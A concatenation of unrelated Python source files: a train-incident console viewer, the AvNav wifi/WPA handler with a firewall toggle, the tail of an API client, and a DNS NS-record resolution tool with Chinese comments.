None) if self.config.debug: logHandler.enableDebug(True) logHandler.enableLogger() logHandler.dynamicLogger('Debug logging enabled', logLevel = DEBUG) if self.config.useProxy is True: if self.config.proxyHost == 'None': raise CongifurationException("Please set the Proxy Host with -P or --proxy when using -x") try: tryproxy = self.validate() if tryproxy: logHandler.dynamicLogger("Proxy Check successful, proceeding.") else: logHandler.dynamicLogger("Proxy Check failed, exiting") exit() except Exception as e: raise Exception("Proxy Check Failed: %s" % e) if self.config.numAssetThreads >= 1: self.downloadAssets = True if self.config.numDetectionThreads >= 1: self.downloadDetections = True if self.config.numHostAssetThreads >= 1: self.downloadHostAssets = True if not self.downloadAssets and not self.downloadDetections and not self.downloadHostAssets: raise CongifurationException( "Please set at least one of -a / -d / -h option You haven't set any of them with valid value") try: v = self.validate() if v: logHandler.dynamicLogger("Validation successful, proceeding. verifying limits") self.checkLimits() else: exit() except Exception as e: import traceback logHandler.dynamicLogger( self.logMessages.message(TRACEUNEXPECTED), 'error', traceback = traceback.format_exc()) raise Exception("Validation Failed: %s" % e) if __name__ == "__main__": qapi = APIClient() qapi.execute()
main.py
import requests import pytz import time import xml.etree.ElementTree as elementTree import os import threading from datetime import datetime from io import StringIO from html.parser import HTMLParser operators = [] class MLStripper(HTMLParser): def __init__(self): super().__init__() self.reset() self.strict = False self.convert_charrefs = True self.text = StringIO() def handle_data(self, d): self.text.write(d) def get_data(self): return self.text.getvalue() def strip_tags(html): s = MLStripper() s.feed(html) return s.get_data() def clear_console(): command = 'clear' if os.name in ('nt', 'dos'): # If Machine is running on Windows, use cls command = 'cls' os.system(command) def center_text(stri, size): if len(stri) >= size: return stri left = int((size - len(stri)) / 2) right = int(size - len(stri) - left) return left * "=" + stri + right * "=" def print_clock(): while True: london_time = datetime.now(pytz.timezone('Europe/London')) print("================", london_time.strftime("%H:%M:%S"), "================", end="\r") time.sleep(0.2) def main(): i = 0 clock = threading.Thread(target=print_clock) url = 'https://internal.nationalrail.co.uk/xml/5.0/incidents.xml' r = requests.get(url) incidents = elementTree.fromstring(r.content) for x in incidents.iter("{http://nationalrail.co.uk/xml/incident}PtIncident"): op_name = x.find("{http://nationalrail.co.uk/xml/incident}Affects").find( "{http://nationalrail.co.uk/xml/incident}Operators") \ .find("{http://nationalrail.co.uk/xml/incident}AffectedOperator"). \ find("{http://nationalrail.co.uk/xml/incident}OperatorName") if op_name.text not in operators: operators.append(op_name.text) # Choose affected carrier while True: clear_console() i = 0 for x in operators: i += 1 print(i, ") ", x, sep="") i += 1 print(i, ") Every line", sep="") print("================================================================") print("Enter the carrier number to see the disruptions that affect it: ", end="") x = int(input()) if 0 < x <= i: if x is i: op_name = "" else: op_name = operators[x - 1] break # Start clock clock.start() while True: # Pull XML from server r = requests.get(url) incidents = elementTree.fromstring(r.content) # Clear screen and print console header clear_console() print(" BRITISH RAILWAYS INCIDENTS APP") print("============ Affected lines ==============") print() # Iterate every accident for x in incidents.iter("{http://nationalrail.co.uk/xml/incident}PtIncident"): priority = int(x.find("{http://nationalrail.co.uk/xml/incident}IncidentPriority").text) cleared = x.find("{http://nationalrail.co.uk/xml/incident}ClearedIncident") operator = x.find("{http://nationalrail.co.uk/xml/incident}Affects").find( "{http://nationalrail.co.uk/xml/incident}Operators") \ .find("{http://nationalrail.co.uk/xml/incident}AffectedOperator"). \ find("{http://nationalrail.co.uk/xml/incident}OperatorName").text if cleared is not None: cleared = cleared.text else: cleared = "false" # Print info only when priority is high and accident isn't cleared if cleared == "false" and priority < 3 and (operator == op_name or op_name == ""): routes = x.find("{http://nationalrail.co.uk/xml/incident}Affects").find( "{http://nationalrail.co.uk/xml/incident}RoutesAffected") summary = x.find("{http://nationalrail.co.uk/xml/incident}Summary") description = x.find("{http://nationalrail.co.uk/xml/incident}Description") if description is not None and summary is not None: print(center_text(strip_tags(summary.text), 100)) print("\tDESCRIPTION: ", strip_tags(description.text)) print() print() # Sleep 10s time.sleep(10) # Increase counter i += 1 if __name__ == "__main__": main()
wpahandler.py
# -*- coding: utf-8 -*- # vim: ts=2 sw=2 et ai ############################################################################### # Copyright (c) 2012,2021 Andreas Vogel andreas@wellenvogel.net # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # # parts from this software (AIS decoding) are taken from the gpsd project # so refer to this BSD licencse also (see ais.py) or omit ais.py ############################################################################### import json import time import avnav_handlerList from avnav_manager import AVNHandlerManager from avnav_util import * from avnav_worker import * from wpa_control import WpaControl class FwInfo(object): def __init__(self,ssid,mode,status): self.ssid=ssid self.mode=mode self.status=status #a handler to set up a wpa claient class AVNWpaHandler(AVNWorker): PRIVATE_NAME = "wlan-internal" #name to be set as id_str for wlans that should allow incoming traffic P_FWCOMMAND="firewallCommand" COMMAND_REPEAT=10 #10 seconds for repeat on error COMMAND_REPEAT_OK=1800 #30 minutes for repeat on ok def __init__(self,param): AVNWorker.__init__(self, param) self.wpaHandler=None self.lastScan=datetime.datetime.utcnow() self.scanLock=threading.Lock() self.getRequestParam=AVNUtil.getHttpRequestParam self.commandHandler = None self.lastFwInfo=None @classmethod def getConfigName(cls): return "AVNWpaHandler" @classmethod def getConfigParam(cls, child=None): if child is not None: return None return { 'ownSocket':'/tmp/avnav-wpa-ctrl', #my own socket endpoint 'wpaSocket':"/var/run/wpa_supplicant/wlan-av1", #the wpa control socket 'ownSsid':'avnav,avnav1,avnav2', #cls.P_FWCOMMAND': '', cls.P_FWCOMMAND:'sudo -n $BASEDIR/../raspberry/iptables-ext.sh wlan-av1' } @classmethod def preventMultiInstance(cls): return True def run(self): self.commandHandler = self.findHandlerByName("AVNCommandHandler") wpaSocket=self.getStringParam('wpaSocket') ownSocket=self.getStringParam('ownSocket') watcherThread=threading.Thread(target=self.allowDenyWatcher,name="firewallWatcher") watcherThread.start() while True: try: newWpaSocket=self.getStringParam('wpaSocket') if newWpaSocket != wpaSocket: if self.wpaHandler is not None: self.wpaHandler.close(False) self.wpaHandler=None wpaSocket=newWpaSocket if os.path.exists(wpaSocket): AVNLog.debug("wpa socket %s exists, checking handler", wpaSocket) if self.wpaHandler is None: AVNLog.info("connecting to wpa_supplicant %s",wpaSocket) self.wpaHandler=WpaControl(wpaSocket,ownSocket) self.wpaHandler.open() self.setInfo('main','connected to %s'%(wpaSocket),WorkerStatus.STARTED) else: try: self.wpaHandler.checkOpen() except: AVNLog.error("wpa handler closed...") self.wpaHandler=None else: AVNLog.debug("wpa socket %s does not exist",wpaSocket) if self.wpaHandler is not None: self.wpaHandler.close(False) self.wpaHandler=None AVNLog.info("disconnecting from wpa_supplicant %s",wpaSocket) self.setInfo('main','disconnected from %s'%(wpaSocket),WorkerStatus.INACTIVE) time.sleep(5) continue #we should have an active wpa handler here... #todo: cache scan results here except Exception as e: AVNLog.error("exception in WPAHandler: %s",traceback.format_exc()) pass time.sleep(5) def allowDenyWatcher(self): """ checks for the current active LAN to have id_str="wlan-internal" and open the firewall in this case using the allowDenyCommand @return: """ statusName="FwHandler" cmd=self.getStringParam(self.P_FWCOMMAND) if cmd is None or cmd == "": self.setInfo(statusName, "no command", WorkerStatus.INACTIVE) return cmdparam=cmd.split(" ") command=[] for par in cmdparam: command.append(AVNUtil.replaceParam(par, AVNHandlerManager.filterBaseParam(self.getParam()))) self.setInfo(statusName,"running",WorkerStatus.NMEA) lastNet=None lastMode=None lastResult=-1 lastSuccess=AVNUtil.utcnow() while True: try: status=self.getStatus() if status.get('wpa_state') is not None and status.get('wpa_state') == 'COMPLETED': ssid=status.get('ssid') mode="deny" if status.get('id_str') is not None and status.get('id_str') == self.PRIVATE_NAME: mode="allow" waittime=0 if lastMode == mode and lastNet == ssid: if lastResult != 0: waittime=self.COMMAND_REPEAT else: waittime=self.COMMAND_REPEAT_OK if (AVNUtil.utcnow() - lastSuccess) >= waittime: lastNet=ssid lastMode=mode AVNLog.info("running command %s %s",command,mode) lastResult=AVNUtil.runCommand(command+[mode],statusName+"-command") if lastResult != 0: if lastResult is None: lastResult=-1 AVNLog.error("%s: unable to run firewall command on %s for mode %s, return %d"%(statusName,ssid,mode,lastResult)) self.setInfo(statusName,"unable to run firewall command on %s for %s, return %d"%(ssid,mode,lastResult),WorkerStatus.ERROR) else: self.setInfo(statusName, "firewall command on %s for %s ok" % (ssid,mode), WorkerStatus.NMEA) lastSuccess=AVNUtil.utcnow() self.lastFwInfo=FwInfo(ssid,mode,lastResult) except: AVNLog.error("%s: exception %s"%(statusName,traceback.format_exc())) time.sleep(5) def startScan(self): if self.wpaHandler is None: return self.scanLock.acquire() now=datetime.datetime.utcnow() if now > (self.lastScan + datetime.timedelta(seconds=30)): AVNLog.debug("wpa start scan") self.lastScan=now self.scanLock.release() self.wpaHandler.startScan() return self.scanLock.release() def getList(self): AVNLog.debug("wpa getList") rt=[] wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: self.startScan() except: AVNLog.error("exception in WPAHandler:getList: %s",traceback.format_exc()) try: list=wpaHandler.scanResultWithInfo() ownSSid=self.getStringParam('ownSsid') #remove own ssid for net in list: netSsid=net.get('ssid') if ownSSid is not None and ownSSid != "": if netSsid is not None and netSsid in ownSSid.split(","): continue id_str=net.get('id_str') if id_str is not None and id_str == self.PRIVATE_NAME: net['allowAccess']=True rt.append(net) AVNLog.debug("wpa list %s",rt) return rt except Exception: AVNLog.error("exception in WPAHandler:getList: %s",traceback.format_exc()) return rt def removeNetwork(self,id): rt={'status':'no WLAN'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: AVNLog.debug("wpa remove network",id) wpaHandler.removeNetwork(id) wpaHandler.saveConfig() return {'status':'OK'} except Exception as e: AVNLog.error("exception in WPAHandler:removeNetwork: %s",traceback.format_exc()) return {'status':'commandError','info':str(e)} def enableNetwork(self,id,param=None): rt={'status':'no WLAN'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: AVNLog.debug("wpa enable network",id) if param is not None: self.wpaHandler.configureNetwork(id,param) wpaHandler.enableNetwork(id) wpaHandler.saveConfig() return {'status':'OK'} except Exception as e: AVNLog.error("exception in WPAHandler:enableNetwork: %s",traceback.format_exc()) return {'status':'commandError','info':str(e)} def disableNetwork(self,id): rt={'status':'no WLAN'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: AVNLog.debug("wpa disable network",id) wpaHandler.disableNetwork(id) wpaHandler.saveConfig() return {'status':'OK'} except Exception as e: AVNLog.error("exception in WPAHandler:disableNetwork: %s",traceback.format_exc()) return {'status':'commandError','info':str(e)} def connect(self,param): rt={'status':'no WLAN'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: AVNLog.debug("wpa connect",param) wpaHandler.connect(param) wpaHandler.saveConfig() return {'status':'OK'} except Exception as e: AVNLog.error("exception in WPAHandler:connect: %s",traceback.format_exc()) return {'status':'commandError','info':str(e)} def getStatus(self): rt={'wpa_state':'OFFLINE'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: rt=wpaHandler.status() if rt.get('id_str') is not None and rt.get('id_str') == self.PRIVATE_NAME: rt['allowAccess']=True hasFwResult=False if self.lastFwInfo is not None: if self.lastFwInfo.ssid == rt.get('ssid'): rt['fwStatus']=self.lastFwInfo.status rt['fwMode']=self.lastFwInfo.mode hasFwResult=True if not hasFwResult: rt['fwStatus']=-1 AVNLog.debug("wpa status",rt) return rt except Exception: AVNLog.error("exception in WPAHandler:getStatus: %s",traceback.format_exc()) return {'wpa_state':'COMMANDERROR'} def getHandledCommands(self): return "wpa" def safeInt(self,val): try: return int(val) except: return None def handleApiRequest(self,type,subtype,requestparam,**kwargs): start=datetime.datetime.utcnow() command=self.getRequestParam(requestparam, 'command') AVNLog.debug("wpa api request %s",command) rt=None if command is None: raise Exception('missing command for wpa request') if command == 'list': rt=json.dumps(self.getList()) if command == 'status': rt=json.dumps(self.getStatus()) if command == 'all': cmd=self.getStringParam(self.P_FWCOMMAND) rt={'status':self.getStatus(),'list':self.getList()} if cmd is not None and cmd != "": rt['showAccess']=True rt=json.dumps(rt) if command == 'enable': id=self.getRequestParam(requestparam,'id') updateParam={} psk=self.getRequestParam(requestparam,'psk') if psk is not None and psk != "": updateParam['psk']=psk allowAccess=self.getRequestParam(requestparam,'allowAccess') if allowAccess is not None and allowAccess == 'true': updateParam['id_str']=self.PRIVATE_NAME else: updateParam['id_str']='' rt=json.dumps(self.enableNetwork(id,updateParam)) if command == 'disable': id=self.getRequestParam(requestparam,'id') rt=json.dumps(self.disableNetwork(id)) if command == 'remove': id=self.getRequestParam(requestparam,'id') rt=json.dumps(self.removeNetwork(id)) if command == 'connect': param={} for k in ['ssid','psk']: v=self.getRequestParam(requestparam,k) if v is not None and v != "": param[k]=v key=self.getRequestParam(requestparam,"psk") id = self.getRequestParam(requestparam, 'id') if ( key is None or key == "" ) and ( id is None or self.safeInt(id) < 0) : param['key_mgmt'] = "NONE" else: param['key_mgmt'] = "WPA-PSK" allowAccess=self.getRequestParam(requestparam,'allowAccess') if allowAccess is not None and allowAccess == 'true': param['id_str']=self.PRIVATE_NAME else: param['id_str'] = '' rt=json.dumps(self.connect(param)) if rt is None: raise Exception("unknown command %s"%(command)) end=datetime.datetime.utcnow() AVNLog.debug("wpa request %s lasted %d millis",command,(end-start).total_seconds()*1000) return rt avnav_handlerList.registerHandler(AVNWpaHandler)
obtaining_domain_ns_realtime.py
# encoding:utf-8 """ 分别向顶级域名的权威和DNS递归服务器查询域名的NS记录,并且批量更新 注意:使用两种方法获取域名的NS记录,因为不同方法都无法获取完整的NS记录 """ import sys reload(sys) sys.setdefaultencoding('utf-8') sys.path.append('../') import threading import time import random import datetime import hashlib from Queue import Queue from threading import Thread from collections import defaultdict from resolving_domain_ns_by_tld import get_domain_ns_hierarchical_dns # 获取域名dns from db_manage.data_base import MySQL from db_manage.mysql_config import SOURCE_CONFIG_LOCAL as SOURCE_CONFIG import tldextract from resolving_domain_ns_by_ns import query_domain_ns_by_ns # 获取域名dns from resolving_ip_cname_by_ns import query_ip_cname_by_ns from Logger import Logger from task_confirm import TaskConfirm domain_ns_result = {} # 存储最终的ns结果 retry_domains = [] # 存储需要进行二次探测的域名及其主域名 thread_num = 50 # 主线程数量 retry_thread_num = 20 # 次级线程数量 queue = Queue() # 任务队列 logger = Logger(file_path='./log/',show_terminal=True) # 日志配置 class NSubThread(threading.Thread): """自定义线程类,用于返回结果""" def __init__(self,func,args=()): super(NSubThread, self).__init__() self.func = func self.args = args def run(self): self.result = self.func(*self.args) def get_result(self): try: return self.result # 如果子线程不使用join方法,此处可能会报没有self.result的错误 except Exception,e: logger.logger.error('获取线程的结果失败:',str(e)) return [], 'FALSE' def read_domains(file_name): """ 读取域名存储文件,获取要探测的域名,以及提取出主域名 注意:若是不符合规范的域名,则丢弃 """ domains = [] main_domains = [] no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None) with open(file_name,'r') as fp: for d in fp.readlines(): domain_tld = no_fetch_extract(d.strip()) tld, reg_domain = domain_tld.suffix, domain_tld.domain # 提取出顶级域名和主域名部分 if tld and reg_domain: main_domains.append(reg_domain+'.'+tld) domains.append(d.strip()) else: logger.logger.warning('域名%s不符合规范,不进行探测' % d.strip()) return domains, main_domains def insert_domains_db(domains): """将域名插入到数据库中""" try: db = MySQL(SOURCE_CONFIG) except Exception,e: logger.logger.error(e) return False for domain in domains: sql = 'insert ignore into focused_domain (domain) values ("%s")' % (domain) db.insert_no_commit(sql) db.commit() db.close() return True def extract_domain_tld(domain): """ 提取域名的顶级域名 注意:不符合规范的域名,返回为空 """ no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None) domain_tld = no_fetch_extract(domain) tld = domain_tld.suffix if '.' in tld: # 若是多级顶级域名,则返回最后1级 return tld.split('.')[-1] else: return tld def fetch_tld_ns(): """ 获取顶级域名的权威服务器(ns)IP地址 """ tld_ns = defaultdict(set) try: db = MySQL(SOURCE_CONFIG) sql = 'SELECT tld,server_ipv4 from tld_ns_zone' db.query(sql) tld_ns_query = db.fetch_all_rows() # 获取已存储的顶级域名的权威服务器信息 except Exception, e: logger.logger.error("获取顶级域名异常:",e) return tld_ns db.close() for i in tld_ns_query: tld = str(i['tld']) if i['server_ipv4']: ipv4 = str(i['server_ipv4']).split(';') for ip in ipv4: for p in ip.split(','): if p: tld_ns[tld].add(p) return tld_ns def update_domain_ns_db(id): """添加获取域名的DNS数据""" # 解析关键字段信息 global domain_ns_result ns_result = [] try: db = MySQL(SOURCE_CONFIG) except: logger.logger.error("数据库连接失败") return for domain in domain_ns_result: v = domain_ns_result[domain] domain_ns = ','.join(v[0]) ns_md5 = hashlib.md5(domain_ns).hexdigest() tld_ns = ','.join(v[1]) ns_ns = ','.join(v[2]) invalid_ns = ','.join(v[3]) unknown_ns = ','.join(v[4]) verify_strategy = v[5] insert_time = v[6] ns_result.append((domain,ns_md5,domain_ns,tld_ns,ns_ns,invalid_ns,unknown_ns,verify_strategy,insert_time,id)) ns_sql = 'INSERT INTO domain_valid_ns (domain,ns_md5,domain_ns,tld_ns,ns_ns,invalid_ns,unknown_ns,verify_strategy,insert_time,task_id) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \ ON DUPLICATE KEY UPDATE ns_md5 = VALUES (ns_md5),domain_ns=VALUES(domain_ns),tld_ns=VALUES (tld_ns),ns_ns = VALUES (ns_ns),invalid_ns=VALUES (invalid_ns), \ unknown_ns=VALUES (unknown_ns), verify_strategy=VALUES (verify_strategy),insert_time = VALUES (insert_time),task_id = VALUES (task_id)' # 存在则更新,不存在则插入 try: db.update_many(ns_sql, ns_result) except Exception as e: logger.logger.error("更新域名的NS记录失败:" + str(e)) db.close() def create_queue(domains, main_domains): """ 创建首次探测的任务队列 """ for i, d in enumerate(domains): queue.put((d,main_domains[i])) def create_retry_queue(retry_domains): """ 创建二次探测的任务队列 """ for domain,main_domain in retry_domains: queue.put((domain,main_domain)) def obtain_domain_ns_by_tld(domain, tld_ns): """ 向顶级域名权威服务器请求域名的NS记录,采用子线程方式,加快探测效率 :param domain: string,要解析的域名 tld_ns: dict,顶级域名权威服务器的IP地址集合 :return domain_ns: 域名的权威服务器名称集合 is_retry: true/false, true表示该域名要再次进行探测,false则不需要 """ is_retry = True # 是否重新获取, 有顶级域名返回ns,或者是域名不存在,都不重新获取 status = [] tld = extract_domain_tld(domain) # 获取要查询域名tld if not tld: logger.logger.warning("不存在该域名:%s的顶级域名" % domain) return [] tld_ns_set = tld_ns.get(tld) # 顶级域名的权威服务器IP地址 if not tld_ns_set: logger.logger.warning("不存在该顶级域名:%s的权威服务器" % tld) return [] sub_thread = [] # 线程列表 domain_ns = [] for ip in tld_ns_set: t = NSubThread(get_domain_ns_hierarchical_dns, args=(domain, True, ip)) # 根据顶级域名权威数量,生成对应的子线程 sub_thread.append(t) t.start() for t in sub_thread: t.join() ns, ns_status = t.get_result() status.append(ns_status) if ns_status == 'TRUE': domain_ns.extend(ns[1]) is_retry = False # 若域名存在有效的ns,则不需要再次探测 elif ns_status == 'NOEXSIT': # 若域名不存在,也不需要再次探测 is_retry = False return list(set(domain_ns)), is_retry def obtaining_domain_ns_by_ns(domain,main_domain, tld_domain_ns): """ 向域名的权威服务器请求ns,获取域名权威服务器上的的ns记录集合 :param string domain: 要解析的原始域名 :param string main_domain: 主域名 :param list tld_domain_ns: tld解析的域名的ns权威服务器地址名称集合 :return list domain_ns: 经过验证后的有效域名ns地址集合 """ domain_ns = [] # 验证后的有效域名ns集合 sub_thread = [] # 子线程集合 tld_domain_valid_ns = [] # 顶级域名权威服务器解析的域名ns结果 tld_domain_valid_ns_dict = {} # 记录各个响应的内容结果 tld_domain_invalid_ns = [] # 顶级域名权威服务器解析的域名ns结果 ns_domain_invalid_ns = [] ns_domain_ns = [] # 域名权威服务器解析的域名ns结果 unknown_ns = [] # 未确定的ns # 创建子线程 for n in tld_domain_ns: t = NSubThread(query_domain_ns_by_ns, args=(main_domain, n)) sub_thread.append(t) t.setDaemon(True) t.start() # 获取域名权威服务器上的ns记录 for t in sub_thread: t.join() ns, ns_status, original_ns = t.get_result() if ns_status == 'TRUE': ns_domain_ns.extend(ns) tld_domain_valid_ns.append(original_ns) tld_domain_valid_ns_dict[original_ns] = ns else: tld_domain_invalid_ns.append(original_ns) ns_domain_ns = list(set(ns_domain_ns)) # 去重 if not tld_domain_valid_ns: # 若无ns,则返回空,停止 verify_strategy = 1 is_retry = True return domain_ns,tld_domain_ns,ns_domain_ns,list(set(ns_domain_invalid_ns+tld_domain_invalid_ns)),unknown_ns, verify_strategy, is_retry # 无有效的tld_ns,所以重新探测 ns_domain_del_ns = list(set(ns_domain_ns)-set(tld_domain_invalid_ns)) # 去除域名权威返回的ns中不可以正常解析的地址名称 is_same = set(tld_domain_valid_ns) == set(ns_domain_del_ns) # 判断有效两级的有效ns是否相同 # 相同,则直接返回正确的地址 if is_same: domain_ns = tld_domain_valid_ns # 域名有效的ns verify_strategy = 2 is_retry = False return domain_ns, tld_domain_ns, ns_domain_ns, list( set(ns_domain_invalid_ns + tld_domain_invalid_ns)), unknown_ns, verify_strategy, is_retry # 不同,进一步分析处理 intersection_ns = set(tld_domain_valid_ns).intersection(set(ns_domain_del_ns)) # 上下级ns的交集 # print intersection_ns if intersection_ns: # 交集不为空 is_retry = False domain_ns.extend(intersection_ns) # 首先,交集ns为部分有效ns verify_strategy = 3 # 对于只存在则域名ns的记录进行判断 only_ns = list(set(ns_domain_ns).difference(intersection_ns)) for n in only_ns: ns, ns_status, _ = query_domain_ns_by_ns(main_domain, n) # 向域名的权威ns请求域名的ns if ns_status == 'TRUE': # 可正常解析 if set(ns).intersection(set(domain_ns)): # 若与公共ns有交集,则判断为有效ns domain_ns.append(n) else: flag = verify_ns_by_ip(domain,n,domain_ns) if flag == 1: domain_ns.append(n) elif flag == 0: ns_domain_invalid_ns.append(n) else: unknown_ns.append(n) else: # 无法正常解析,则为无效ns ns_domain_invalid_ns.append(n) # 对于只存在在顶级域名权威的ns记录判断 only_tld = list(set(tld_domain_valid_ns).difference(intersection_ns)) for n in only_tld: ns = tld_domain_valid_ns_dict.get(n) if set(ns).intersection(set(domain_ns)): domain_ns.append(n) else: flag = verify_ns_by_ip(domain, n, domain_ns) if flag == 1: domain_ns.append(n) elif flag == 0: tld_domain_invalid_ns.append(n) else: unknown_ns.append(n) else: # 两级获取的ns完全不一样的情况 verify_strategy = 4 is_retry = True logger.logger.info("域名:%s 两级ns无交集" % domain) if ns_domain_del_ns: # ns不为空 tld_ip, tld_cname = [], [] tld_ip_dict, tld_cname_dict = {}, {} for n in tld_domain_valid_ns: ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain,n) if ip_cname_status == 'TRUE' and (ipv4 or cnames): tld_ip.extend(ipv4) tld_cname.extend(cnames) tld_ip_dict[n] = ipv4 tld_cname_dict[n] = cnames ns_ip, ns_cname = [],[] ns_ip_dict, ns_cname_dict = {}, {} for n in ns_domain_del_ns: ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, n) if ip_cname_status == 'TRUE' and (ipv4 or cnames): ns_ip.extend(ipv4) ns_cname.extend(cnames) ns_ip_dict[n] = ipv4 ns_cname_dict[n] = cnames if not (ns_ip or ns_cname) and (tld_ip or tld_cname): # ns返回的ip为空,tld返回的不为空 for n in tld_ip_dict: domain_ns.append(n) elif (ns_ip or ns_cname) and not (tld_ip or tld_cname): # ns返回ip不为空,tld返回为空 for n in ns_ip_dict: domain_ns.append(n) elif (ns_ip or ns_cname) and (tld_ip or tld_cname): # 都不为空 for n in tld_ip_dict: if set(tld_ip_dict[n]).intersection(set(ns_ip)) or set(tld_cname_dict[n]).intersection(set(ns_cname)): domain_ns.append(n) else: unknown_ns.append(n) # print "无操作,修改程序" for n in ns_ip_dict: if set(ns_ip_dict[n]).intersection(set(tld_ip)) or set(ns_cname_dict[n]).intersection( set(tld_cname)): domain_ns.append(n) else: # print "无操作,修改程序" unknown_ns.append(n) else: # ns为空 for n in tld_domain_valid_ns: # 返回IP或cname ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, n) if ip_cname_status == 'TRUE' and (ipv4 or cnames): domain_ns.append(n) else: tld_domain_invalid_ns.append(n) domain_ns.sort() invalid_ns = list(set(ns_domain_invalid_ns + tld_domain_invalid_ns)) return domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy,is_retry def master_control(tld_ns): """主线程控制""" global domain_ns_result global retry_domains while queue.qsize(): logger.logger.info('存活线程: %s, 剩余任务: %s' % (threading.activeCount(),queue.qsize())) domain, main_domain = queue.get() ns_by_tld, is_retry = obtain_domain_ns_by_tld(main_domain, tld_ns) # 通过顶级域名权威获取域名的ns # print ns_by_tld, is_retry if ns_by_tld: domain_ns,tld_domain_ns,ns_domain_ns,invalid_ns, unknown_ns, verify_strategy,is_retry = obtaining_domain_ns_by_ns(domain,main_domain, ns_by_tld) if is_retry and not domain_ns: # 重试为true,并且无有效ns时,则重试 retry_domains.append((domain, main_domain)) # ns_md5 = hashlib.md5(domain_ns).hexdigest() else: if is_retry: retry_domains.append((domain, main_domain)) domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy = [], [], [], [], [], 0 # verify_strategy=0,表示没有获取tld的内容 insert_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") domain_ns_result[domain] = (domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy, insert_time) # time.sleep(1) queue.task_done() def verify_ns_by_ip(domain, ns, intersection_ns): """ 通过ip地址验证是否为有效ns :param string domain: 要验证的domain :param string ns: 要验证的ns :param list intersection_ns: 已经确认的有效ns集合 :return: int flag : 1/0/-1, 1表示有效,0表示无效, -1表示未知 """ ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, ns) verify_result = [] if ip_cname_status == 'TRUE' and (ipv4 or cnames): for n in intersection_ns: n_ipv4, n_cnames, n_ip_cname_status = query_ip_cname_by_ns(domain, n) if n_ip_cname_status == 'TRUE': if set(ipv4).intersection(set(n_ipv4)) or set(cnames).intersection(set(n_cnames)): verify_result.append(1) break # 出现交集,则停止 else: verify_result.append(-1) # 有ip地址,但是无交集 else: verify_result.append(0) else: verify_result.append(0) if 1 in verify_result: return 1 elif -1 in verify_result: return -1 else: return 0 def save_to_file(id): """ 将有效的ns存入到本地文件中 :param domain_ns: :param id: :return: """ global domain_ns_result insert_time = datetime.datetime.now().strftime("%Y%m%d%H%M%S") path = '../domain_data/' file_name = id+'_'+ insert_time try: fp = open(path+file_name,'w') for domain in domain_ns_result: domain_ns = domain_ns_result[domain][0] domain_ns = ','.join(domain_ns) if domain_ns: fp.write(domain+'\t'+'NS'+'\t'+domain_ns+'\n') fp.close() return file_name except Exception, e: print e return False def first_obtaining_domain_ns(domains,main_domains,tld_ns): """ 第一次获取域名的有效ns记录 """ create_queue(domains,main_domains) worker_list = [] for q in range(thread_num): # 开始任务 worker = Thread(target=master_control,args=(tld_ns,)) worker.setDaemon(True) worker.start() worker_list.append(worker) queue.join() def retry_obtaining_domain_ns(tld_ns): """ 再次探测第一次未成功获取ns的域名 """ global retry_domains if not retry_domains: return print '重新探测的域名数量:',len(retry_domains),retry_domains create_retry_queue(retry_domains) worker_list = [] for q in range(retry_thread_num): # 开始任务 worker = Thread(target=master_control, args=(tld_ns,)) worker.setDaemon(True) worker.start() worker_list.append(worker) queue.join() def obtaining_domain_ns(file_name,id): """主函数""" logger.logger.info('开始解析域名的NS记录,线程数量为:%s' % thread_num) tld_ns = fetch_tld_ns() domains, main_domains = read_domains(file_name) if insert_domains_db(domains): logger.logger.info("成功将域名更新到数据库") else: logger.logger.info('将域名更新到数据库失败') first_obtaining_domain_ns(domains, main_domains, tld_ns) retry_obtaining_domain_ns(tld_ns) if domain_ns_result: # 更新数据库和文件,也使用两个子线程完成 logger.logger.info('更新数据库...') update_domain_ns_db(id) logger.logger.info('更新数据库完成') logger.logger.info('存入文件...') file_name = save_to_file(id) logger.logger.info('存入文件完成') for _ in range(3): # 重试三次 flag = TaskConfirm(file_name).query_post() # 发送探测完成消息 if isinstance(flag, bool): # 成功则停止发送 break else: logger.logger.error('实时探测域名有效NS,确认探测失败:%s' % flag) logger.logger.info('结束解析域名的NS记录,线程数量为:%s' % thread_num) def main(): # file_name = '../domain_data/domains_201907011111' file_name = '../domain_data/top500.txt' # file_name = '../domain_data/test2.txt' obtaining_domain_ns(file_name,'4') # while True: # obtaining_domain_ns() # time.sleep(60) if __name__ == '__main__': main()
router.py
